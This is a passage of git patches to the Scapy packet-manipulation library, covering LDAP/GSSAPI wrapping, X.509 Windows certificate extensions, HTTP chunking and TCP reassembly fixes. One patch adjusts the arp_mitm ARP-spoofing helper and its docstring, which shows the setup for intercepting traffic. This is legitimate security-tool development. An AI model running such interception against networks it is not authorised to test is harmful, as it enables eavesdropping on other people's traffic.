bytes(saslOptions), False - )[1], + self.sspcontext, + bytes(saslOptions), + # We still haven't finished negotiating + conf_req_flag=False, + ), ), ) ) @@ -1403,6 +1594,12 @@ def bind(self, simple_username=None, simple_password=None): raise RuntimeError( "GSSAPI SASL failed to negotiate client security flags !" ) + # SASL wrapping is now available. + self.sasl_wrap = self.encrypt or self.sign + if self.sasl_wrap: + self.sock.closed = True # prevent closing by marking it as already closed. + self.sock = StreamSocket(self.sock.ins, LDAP_SASL_Buffer) + # Success. if self.verb: print("%s bind succeeded !" % self.mech.name) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 12cc8bf5335..9f26988fa0c 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1008,6 +1008,9 @@ class NTLMSSP_MESSAGE_SIGNATURE(Packet): LEIntField("SeqNum", 0x00000000), ] + def default_payload_class(self, payload): + return conf.padding_layer + _GSSAPI_OIDS["1.3.6.1.4.1.311.2.2.10"] = NTLM_Header _GSSAPI_SIGNATURE_OIDS["1.3.6.1.4.1.311.2.2.10"] = NTLMSSP_MESSAGE_SIGNATURE diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 5dbff1f28e7..7f39c2332e4 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -96,9 +96,13 @@ 0x0000010C: "STATUS_NOTIFY_ENUM_DIR", 0x00000532: "ERROR_PASSWORD_EXPIRED", 0x00000533: "ERROR_ACCOUNT_DISABLED", + 0x000006FE: "ERROR_TRUST_FAILURE", 0x80000005: "STATUS_BUFFER_OVERFLOW", 0x80000006: "STATUS_NO_MORE_FILES", 0x8000002D: "STATUS_STOPPED_ON_SYMLINK", + 0x8009030C: "SEC_E_LOGON_DENIED", + 0x8009030F: "SEC_E_MESSAGE_ALTERED", + 0x80090310: "SEC_E_OUT_OF_SEQUENCE", 0xC0000003: "STATUS_INVALID_INFO_CLASS", 0xC0000004: "STATUS_INFO_LENGTH_MISMATCH", 0xC000000D: "STATUS_INVALID_PARAMETER", diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index d7a596e1010..cfaeeaed75f 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -529,8 +529,8 @@ class CONTEXT(SSP.CONTEXT): __slots__ = [ "supported_mechtypes", "requested_mechtypes", + "req_flags", "negotiated_mechtype", - "first_reply", "first_choice", "sub_context", "ssp", @@ -541,8 +541,8 @@ def __init__( ): self.state = SPNEGOSSP.STATE.FIRST self.requested_mechtypes = None + self.req_flags = req_flags self.first_choice = True - self.first_reply = True self.negotiated_mechtype = None self.sub_context = None self.ssp = None @@ -555,7 +555,9 @@ def __init__( ) else: self.supported_mechtypes = force_supported_mechtypes - super(SPNEGOSSP.CONTEXT, self).__init__(req_flags=req_flags) + super(SPNEGOSSP.CONTEXT, self).__init__() + + # Passthrough attributes and functions def clifailure(self): self.sub_context.clifailure() @@ -572,6 +574,20 @@ def __setattr__(self, attr, val): except AttributeError: return setattr(self.sub_context, attr, val) + # Passthrough the flags property + + @property + def flags(self): + if self.sub_context: + return self.sub_context.flags + return GSS_C_FLAGS(0) + + @flags.setter + def flags(self, x): + if not self.sub_context: + return + self.sub_context.flags = x + def __repr__(self): return "SPNEGOSSP[%s]" % repr(self.sub_context) @@ -757,7 +773,7 @@ def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): ) = Context.ssp.GSS_Init_sec_context( Context.sub_context, val=val, - req_flags=Context.flags, + req_flags=Context.req_flags, ) else: Context.sub_context, tok, status = Context.ssp.GSS_Accept_sec_context( @@ -931,7 +947,10 @@ def GSS_Passive(self, Context: CONTEXT, val=None): mechtype = Context.supported_mechtypes[0] else: return None, GSS_S_BAD_MECH - ssp = self.supported_ssps[mechtype.oid.val] + try: + ssp = self.supported_ssps[mechtype.oid.val] + except KeyError: + return None, GSS_S_BAD_MECH if Context.ssp is not None: # Detect resets diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 24f1a6aa437..52d7d65ad00 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -246,6 +246,8 @@ def __call__(cls, key_path=None): marker = b"RSA PUBLIC KEY" except Exception: # We cannot import an ECDSA public key without curve knowledge + if conf.debug_dissector: + raise raise Exception("Unable to import public key") if obj.frmt == "DER": @@ -595,6 +597,8 @@ def __call__(cls, cert_path): try: cert = X509_Cert(obj.der) except Exception: + if conf.debug_dissector: + raise raise Exception("Unable to import certificate") obj.import_from_asn1pkt(cert) return obj diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index ca3eb5a6189..620bcc2cc6b 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -14,16 +14,36 @@ from scapy.asn1.asn1 import ASN1_Codecs, ASN1_OID, \ ASN1_IA5_STRING, ASN1_NULL, ASN1_PRINTABLE_STRING, \ ASN1_UTC_TIME, ASN1_UTF8_STRING -from scapy.asn1.ber import BER_tagging_dec, BER_Decoding_Error from scapy.asn1packet import ASN1_Packet -from scapy.asn1fields import ASN1F_BIT_STRING, ASN1F_BIT_STRING_ENCAPS, \ - ASN1F_BMP_STRING, ASN1F_BOOLEAN, ASN1F_CHOICE, ASN1F_ENUMERATED, \ - ASN1F_FLAGS, ASN1F_GENERALIZED_TIME, ASN1F_IA5_STRING, ASN1F_INTEGER, \ - ASN1F_ISO646_STRING, ASN1F_NULL, ASN1F_OID, ASN1F_PACKET, \ - ASN1F_PRINTABLE_STRING, ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, ASN1F_SET_OF, \ - ASN1F_STRING, ASN1F_T61_STRING, ASN1F_UNIVERSAL_STRING, ASN1F_UTC_TIME, \ - ASN1F_UTF8_STRING, ASN1F_badsequence, ASN1F_enum_INTEGER, ASN1F_field, \ - ASN1F_optional +from scapy.asn1fields import ( + ASN1F_BIT_STRING_ENCAPS, + ASN1F_BIT_STRING, + ASN1F_BMP_STRING, + ASN1F_BOOLEAN, + ASN1F_CHOICE, + ASN1F_enum_INTEGER, + ASN1F_ENUMERATED, + ASN1F_field, + ASN1F_FLAGS, + ASN1F_GENERALIZED_TIME, + ASN1F_IA5_STRING, + ASN1F_INTEGER, + ASN1F_ISO646_STRING, + ASN1F_NULL, + ASN1F_OID, + ASN1F_optional, + ASN1F_PACKET, + ASN1F_PRINTABLE_STRING, + ASN1F_SEQUENCE_OF, + ASN1F_SEQUENCE, + ASN1F_SET_OF, + ASN1F_STRING_PacketField, + ASN1F_STRING, + ASN1F_T61_STRING, + ASN1F_UNIVERSAL_STRING, + ASN1F_UTC_TIME, + ASN1F_UTF8_STRING, +) from scapy.packet import Packet from scapy.fields import PacketField, MultipleTypeField from scapy.volatile import ZuluTime, GeneralizedTime @@ -216,9 +236,18 @@ class X509_OtherName(ASN1_Packet): ASN1F_CHOICE("value", None, ASN1F_IA5_STRING, ASN1F_ISO646_STRING, ASN1F_BMP_STRING, ASN1F_UTF8_STRING, + ASN1F_STRING, explicit_tag=0xa0)) +class ASN1F_X509_otherName(ASN1F_SEQUENCE): + # field version of X509_OtherName, for usage in [MS-WCCE] + def __init__(self, **kargs): + seq = [ASN1F_SEQUENCE(*X509_OtherName.ASN1_root.seq, + implicit_tag=0xA0)] + ASN1F_SEQUENCE.__init__(self, *seq, **kargs) + + class X509_RFC822Name(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_IA5_STRING("rfc822Name", "") @@ -662,9 +691,16 @@ class X509_ExtComment(ASN1_Packet): ASN1F_BMP_STRING, ASN1F_UTF8_STRING) -class X509_ExtDefault(ASN1_Packet): +class X509_ExtCertificateTemplateName(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_BMP_STRING("Name", b"") + + +class X509_ExtOidNTDSCaSecurity(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_field("value", None) + ASN1_root = ASN1F_X509_otherName() + type_id = ASN1_OID("1.3.6.1.4.1.311.25.2.1") + value = ASN1_UTF8_STRING("") # oid-info.com shows that some extensions share multiple OIDs. @@ -694,51 +730,35 @@ class X509_ExtDefault(ASN1_Packet): "2.5.29.54": X509_ExtInhibitAnyPolicy, "2.16.840.1.113730.1.1": X509_ExtNetscapeCertType, "2.16.840.1.113730.1.13": X509_ExtComment, + "1.3.6.1.4.1.311.20.2": X509_ExtCertificateTemplateName, + "1.3.6.1.4.1.311.25.2": X509_ExtOidNTDSCaSecurity, "1.3.6.1.5.5.7.1.1": X509_ExtAuthInfoAccess, "1.3.6.1.5.5.7.1.3": X509_ExtQcStatements, "1.3.6.1.5.5.7.1.11": X509_ExtSubjInfoAccess } +class _X509_ExtField(ASN1F_STRING_PacketField): + def m2i(self, pkt, s): + val = super(_X509_ExtField, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.extnID.val in _ext_mapping: + return ( + _ext_mapping[pkt.extnID.val](val[0].val, _underlayer=pkt), + val[1], + ) + return val + + class ASN1F_EXT_SEQUENCE(ASN1F_SEQUENCE): - # We use explicit_tag=0x04 with extnValue as STRING encapsulation. def __init__(self, **kargs): seq = [ASN1F_OID("extnID", "2.5.29.19"), ASN1F_optional( ASN1F_BOOLEAN("critical", False)), - ASN1F_PACKET("extnValue", - X509_ExtBasicConstraints(), - X509_ExtBasicConstraints, - explicit_tag=0x04)] + _X509_ExtField("extnValue", X509_ExtBasicConstraints())] ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - def dissect(self, pkt, s): - _, s = BER_tagging_dec(s, implicit_tag=self.implicit_tag, - explicit_tag=self.explicit_tag, - safe=self.flexible_tag) - codec = self.ASN1_tag.get_codec(pkt.ASN1_codec) - i, s, remain = codec.check_type_check_len(s) - extnID = self.seq[0] - critical = self.seq[1] - try: - oid, s = extnID.m2i(pkt, s) - extnID.set_val(pkt, oid) - s = critical.dissect(pkt, s) - encapsed = X509_ExtDefault - if oid.val in _ext_mapping: - encapsed = _ext_mapping[oid.val] - self.seq[2].cls = encapsed - self.seq[2].cls.ASN1_root.flexible_tag = True - # there are too many private extensions not to be flexible here - self.seq[2].default = encapsed() - s = self.seq[2].dissect(pkt, s) - if not self.flexible_tag and len(s) > 0: - err_msg = "extension sequence length issue" - raise BER_Decoding_Error(err_msg, remaining=s) - except ASN1F_badsequence: - raise Exception("could not parse extensions") - return remain - class X509_Extension(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER diff --git a/scapy/sessions.py b/scapy/sessions.py index 23e26de4f7d..4a615e29030 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -248,6 +248,8 @@ def xor(x, y): def _strip_padding(self, pkt: Packet) -> Optional[bytes]: """Strip the packet of any padding, and return the padding. """ + if isinstance(pkt, conf.padding_layer): + return cast(bytes, pkt.load) pad = pkt.getlayer(conf.padding_layer) if pad is not None and pad.underlayer is not None: # strip padding @@ -283,6 +285,9 @@ def process(self, if padding: # There is remaining data for the next payload. self.data.shiftleft(len(self.data) - len(padding)) + # Skip full-padding + if isinstance(packet, conf.padding_layer): + return None else: # No padding (data) left. Clear self.data.clear() @@ -345,6 +350,7 @@ def process(self, if data.full(): # Reassemble using all previous packets metadata["original"] = pkt + metadata["ident"] = ident packet = tcp_reassemble( bytes(data), metadata, @@ -369,6 +375,9 @@ def process(self, del self.tcp_frags[ident] # Minimum next seq metadata["next_seq"] = pkt[TCP].seq + len(new_data) + # Skip full-padding + if isinstance(packet, conf.padding_layer): + return None # Rebuild resulting packet pay.underlayer.remove_payload() if IP in pkt: diff --git a/test/regression.uts b/test/regression.uts index 0f36e4d61ce..98d825b107d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4435,6 +4435,18 @@ except DeprecationWarning: # -Werror is used pass += MIB - Check that MIB OIDs are not duplicated +~ mib + +from scapy.asn1.mib import x509_oids_sets + +_dct = {} +for d in x509_oids_sets: + for elt in d: + if elt in _dct: + raise ValueError("OID %s already exists" % elt) + _dct.update(d) + = BER tests BER_id_enc(42) == '*' diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 12133d8b351..aa7e13cc5a6 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -1545,12 +1545,11 @@ assert tok is None data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" -edata, sig = client.GSS_Wrap( +sig = client.GSS_Wrap( clicontext, data, conf_req_flag=False, ) -assert edata == b"" assert sig.TOK_ID == b"\x05\x04" assert sig.root.Flags == 4 assert sig.root.EC == 12 @@ -1559,7 +1558,6 @@ assert bytes(sig) == b'\x05\x04\x04\xff\x00\x0c\x00\x0c\x00\x00\x00\x00@\x00\x00 ddata = server.GSS_Unwrap( srvcontext, - edata, sig, ) assert ddata == data @@ -1568,12 +1566,11 @@ assert ddata == data data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" -edata, sig = server.GSS_Wrap( +sig = server.GSS_Wrap( srvcontext, data, conf_req_flag=False, ) -assert edata == b"" assert sig.TOK_ID == b"\x05\x04" assert sig.root.Flags == 5 assert sig.root.EC == 12 @@ -1583,7 +1580,6 @@ assert bytes(sig) == b"\x05\x04\x05\xff\x00\x0c\x00\x0c\x00\x00\x00\x00\x00\x00\ ddata = client.GSS_Unwrap( clicontext, - edata, sig, ) assert ddata == data diff --git a/test/scapy/layers/x509.uts b/test/scapy/layers/x509.uts index 4fa958040b8..456bb091342 100644 --- a/test/scapy/layers/x509.uts +++ b/test/scapy/layers/x509.uts @@ -150,6 +150,35 @@ except: else: assert False += Cert class: Import Windows AD certificate +from scapy.layers.x509 import X509_Cert +c = base64_bytes('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') +x=X509_Cert(c) + += Cert class: Check some Windows-specific extensions +tbs = x.tbsCertificate +ext = tbs.extensions +assert type(ext) is list +assert len(ext) == 10 + +assert [x[0].extnID.oidname for x in ext] == [ + 'ENROLL_CERTTYPE', + 'extKeyUsage', + 'keyUsage', + 'smimeCapabilities', + 'subjectKeyIdentifier', + 'authorityKeyIdentifier', + 'cRLDistributionPoints', + 'authorityInfoAccess', + 'subjectAltName', + 'NTDS_CA_SECURITY_EXT', +] +assert ext[0].extnValue.Name == b'\x00D\x00o\x00m\x00a\x00i\x00n\x00C\x00o\x00n\x00t\x00r\x00o\x00l\x00l\x00e\x00r' +assert ext[1].extnValue.extendedKeyUsage[0].oid == '1.3.6.1.5.5.7.3.2' +assert ext[6].extnValue.cRLDistributionPoints[0].distributionPoint.distributionPointName.fullName[0].generalName.uniformResourceIdentifier == b'ldap:///CN=domain-DC1-CA,CN=DC1,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=domain,DC=local?certificateRevocationList?base?objectClass=cRLDistributionPoint' +assert ext[8].extnValue.subjectAltName[1].generalName.dNSName == b"DC1.domain.local" +assert ext[9].extnValue.value == b'S-1-5-21-1924137214-3718646274-40215721-1000' + ############ CRL class ############################################### + X509_CRL class tests From 2fdffe289f8d523c9725f28715c79fa0743d689b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 22 Jun 2024 13:01:12 +0200 Subject: [PATCH 1301/1632] Fix bugs in HTTP implementation (#4438) * Small bug fixes when parsing HTTP - new auto_chunk parameter. add handling of build - fix TCPSession not properly handling empty packets in app=True mode - fix bug where StringBuffer would add an empty byte \x00 when passed an empty string * Add chunk test --- scapy/layers/http.py | 89 ++++++++++++++++++++++---------------- scapy/sessions.py | 15 ++++--- test/scapy/layers/http.uts | 7 +++ test/scapy/layers/inet.uts | 4 ++ 4 files changed, 72 insertions(+), 43 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index bb563464981..2e211840d55 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -32,6 +32,12 @@ >>> conf.contribs["http"]["auto_compression"] = False +(Defaults to True) + +You can also turn auto-chunking/dechunking off with:: + + >>> conf.contribs["http"]["auto_chunk"] = False + (Defaults to True) """ @@ -92,6 +98,7 @@ if "http" not in conf.contribs: conf.contribs["http"] = {} conf.contribs["http"]["auto_compression"] = True + conf.contribs["http"]["auto_chunk"] = True # https://en.wikipedia.org/wiki/List_of_HTTP_header_fields @@ -302,11 +309,9 @@ def hashret(self): def post_dissect(self, s): self._original_len = len(s) - if not conf.contribs["http"]["auto_compression"]: - return s encodings = self._get_encodings() # Un-chunkify - if "chunked" in encodings: + if conf.contribs["http"]["auto_chunk"] and "chunked" in encodings: data = b"" while s: length, _, body = s.partition(b"\r\n") @@ -324,6 +329,8 @@ def post_dissect(self, s): data += load if not s: s = data + if not conf.contribs["http"]["auto_compression"]: + return s # Decompress try: if "deflate" in encodings: @@ -366,39 +373,42 @@ def post_dissect(self, s): return s def post_build(self, pkt, pay): - if not conf.contribs["http"]["auto_compression"]: - return pkt + pay encodings = self._get_encodings() - # Compress - if "deflate" in encodings: - import zlib - pay = zlib.compress(pay) - elif "gzip" in encodings: - pay = gzip.compress(pay) - elif "compress" in encodings: - if _is_lzw_available: - pay = lzw.compress(pay) - else: - log_loading.info( - "Can't import lzw. compress compression " - "will be ignored !" - ) - elif "br" in encodings: - if _is_brotli_available: - pay = brotli.compress(pay) - else: - log_loading.info( - "Can't import brotli. brotli compression will " - "be ignored !" - ) - elif "zstd" in encodings: - if _is_zstd_available: - pay = zstandard.ZstdCompressor().compress(pay) - else: - log_loading.info( - "Can't import zstandard. zstd compression will " - "be ignored !" - ) + if conf.contribs["http"]["auto_compression"]: + # Compress + if "deflate" in encodings: + import zlib + pay = zlib.compress(pay) + elif "gzip" in encodings: + pay = gzip.compress(pay) + elif "compress" in encodings: + if _is_lzw_available: + pay = lzw.compress(pay) + else: + log_loading.info( + "Can't import lzw. compress compression " + "will be ignored !" + ) + elif "br" in encodings: + if _is_brotli_available: + pay = brotli.compress(pay) + else: + log_loading.info( + "Can't import brotli. brotli compression will " + "be ignored !" + ) + elif "zstd" in encodings: + if _is_zstd_available: + pay = zstandard.ZstdCompressor().compress(pay) + else: + log_loading.info( + "Can't import zstandard. zstd compression will " + "be ignored !" + ) + # Chunkify + if conf.contribs["http"]["auto_chunk"] and "chunked" in encodings: + # Dumb: 1 single chunk. + pay = (b"%X" % len(pay)) + b"\r\n" + pay + b"\r\n0\r\n\r\n" return pkt + pay def self_build(self, **kwargs): @@ -643,8 +653,13 @@ def tcp_reassemble(cls, data, metadata, _): # Packets may have a Content-Length we must honnor length = http_packet.Content_Length # Heuristic to try and detect instant HEAD responses, as those include a - # Content-Length that must not be honored. - if is_response and data.endswith(b"\r\n\r\n"): + # Content-Length that must not be honored. This is a bit crappy, and assumes + # that a 'HEAD' will never include an Encoding... + if ( + is_response and + data.endswith(b"\r\n\r\n") and + not http_packet[HTTPResponse]._get_encodings() + ): detect_end = lambda _: True elif length is not None: # The packet provides a Content-Length attribute: let's diff --git a/scapy/sessions.py b/scapy/sessions.py index 4a615e29030..01e005505e5 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -104,6 +104,8 @@ def __init__(self): self.incomplete = [] # type: List[Tuple[int, int]] def append(self, data: bytes, seq: Optional[int] = None) -> None: + if not data: + return data_len = len(data) if seq is None: seq = self.content_len @@ -136,7 +138,7 @@ def full(self): # type: () -> bool # Should only be true when all missing data was filled up, # (or there never was missing data) - return True # XXX + return bool(self) def clear(self): # type: () -> None @@ -275,11 +277,12 @@ def process(self, self.metadata["tcp_reassemble"] = tcp_reassemble = streamcls(cls) else: return None - packet = tcp_reassemble( - bytes(self.data), - self.metadata, - self.session, - ) + if self.data.full(): + packet = tcp_reassemble( + bytes(self.data), + self.metadata, + self.session, + ) if packet: padding = self._strip_padding(packet) if padding: diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 5e34c44a549..3313e6b6150 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -85,6 +85,11 @@ assert a[5].Expires == b'Mon, 01 Apr 2024 22:25:38 GMT' assert a[5].Reason_Phrase == b'Moved Permanently' assert a[5].X_Frame_Options == b"SAMEORIGIN" += HTTP build with 'chunked' content type + +pkt = HTTP()/HTTPResponse(Content_Encoding="chunked", Date=b'Sat, 22 Jun 2024 10:00:00 GMT')/(b"A" * 100) +assert bytes(pkt) == b'HTTP/1.1 200 OK\r\nContent-Encoding: chunked\r\nDate: Sat, 22 Jun 2024 10:00:00 GMT\r\n\r\n64\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n0\r\n\r\n' + = HTTP decompression (gzip) conf.debug_dissector = True @@ -248,11 +253,13 @@ for i in range(3, 10): = Test chunked with gzip conf.contribs["http"]["auto_compression"] = False +conf.contribs["http"]["auto_chunk"] = False z = b'\x1f\x8b\x08\x00S\\-_\x02\xff\xb3\xc9(\xc9\xcd\xb1\xcb\xcd)\xb0\xd1\x07\xb3\x00\xe6\xedpt\x10\x00\x00\x00' a = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=1)/HTTP()/HTTPResponse(Content_Encoding="gzip", Transfer_Encoding="chunked")/(b"5\r\n" + z[:5] + b"\r\n") b = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=len(a[TCP].payload)+1)/HTTP()/(hex(len(z[5:])).encode()[2:] + b"\r\n" + z[5:] + b"\r\n0\r\n\r\n") xa, xb = IP(raw(a)), IP(raw(b)) conf.contribs["http"]["auto_compression"] = True +conf.contribs["http"]["auto_chunk"] = True c = sniff(offline=[xa, xb], session=TCPSession)[0] import gzip diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index f2579094584..b73a06431d5 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -107,6 +107,10 @@ assert bytes_hex(bytes(buffer)) == b'0070696e6b696500706965' assert len(buffer) == 11 assert buffer +buffer = StringBuffer() +buffer.append(b"") +assert not buffer +assert bytes(buffer) == b"" ############ ############ From 039d10e3c5597b174be2d78d40bc4800358fc8fc Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 22 Jun 2024 13:08:37 +0200 Subject: [PATCH 1302/1632] Fix inet.py bugs (#4435) --- scapy/asn1/mib.py | 9 +++++++-- scapy/layers/l2.py | 5 +++-- test/scapy/layers/l2.uts | 4 ++-- 3 files changed, 12 insertions(+), 6 deletions(-) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 7f8854b7669..c0bc3a6b7ff 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -532,6 +532,10 @@ def load_mib(filenames): "1.3.6.1.5.5.7.48.1.1": "basic-response" } +certTransp_oids = { + '1.3.6.1.4.1.11129.2.4.2': "SignedCertificateTimestampList", +} + # ansi-x962 # x962KeyType_oids = { @@ -669,11 +673,12 @@ def load_mib(filenames): attributeType_oids, certificateExtension_oids, certExt_oids, + certPkixAd_oids, + certPkixKp_oids, certPkixPe_oids, certPkixQt_oids, - certPkixKp_oids, - certPkixAd_oids, certPolicy_oids, + certTransp_oids, evPolicy_oids, x962KeyType_oids, x962Signature_oids, diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 49e2d0fdd15..ca3f0d87ffc 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -910,6 +910,7 @@ def arp_mitm( $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface $ sysctl net.ipv4.ip_forward=1 + $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1 $ sudo scapy >>> arp_mitm("192.168.122.156", "192.168.122.17") @@ -986,7 +987,7 @@ def _tups(ip, mac): for ipa, maca in tup1 for ipb, macb in tup2 for x in - Ether(dst=maca, src=macb) / + Ether(dst="ff:ff:ff:ff:ff:ff", src=macb) / ARP(op="who-has", psrc=ipb, pdst=ipa, hwsrc=macb, hwdst="00:00:00:00:00:00") ), @@ -994,7 +995,7 @@ def _tups(ip, mac): for ipb, macb in tup2 for ipa, maca in tup1 for x in - Ether(dst=macb, src=maca) / + Ether(dst="ff:ff:ff:ff:ff:ff", src=maca) / ARP(op="who-has", psrc=ipa, pdst=ipb, hwsrc=maca, hwdst="00:00:00:00:00:00") ), diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index 4f05574768c..de9d6190fe8 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -65,12 +65,12 @@ def srploop_spoof(x, *args, **kwargs): def sendp_spoof(x, *args, **kwargs): assert len(x) == 2 - assert x[0].dst == "cc:cc:cc:cc:cc:cc" + assert x[0].dst == "ff:ff:ff:ff:ff:ff" assert x[0].src == x[0].hwsrc == "bb:bb:bb:bb:bb:bb" assert x[0].hwdst == "00:00:00:00:00:00" assert x[0].psrc == "192.168.0.2" assert x[0].pdst == "192.168.0.1" - assert x[1].dst == "bb:bb:bb:bb:bb:bb" + assert x[1].dst == 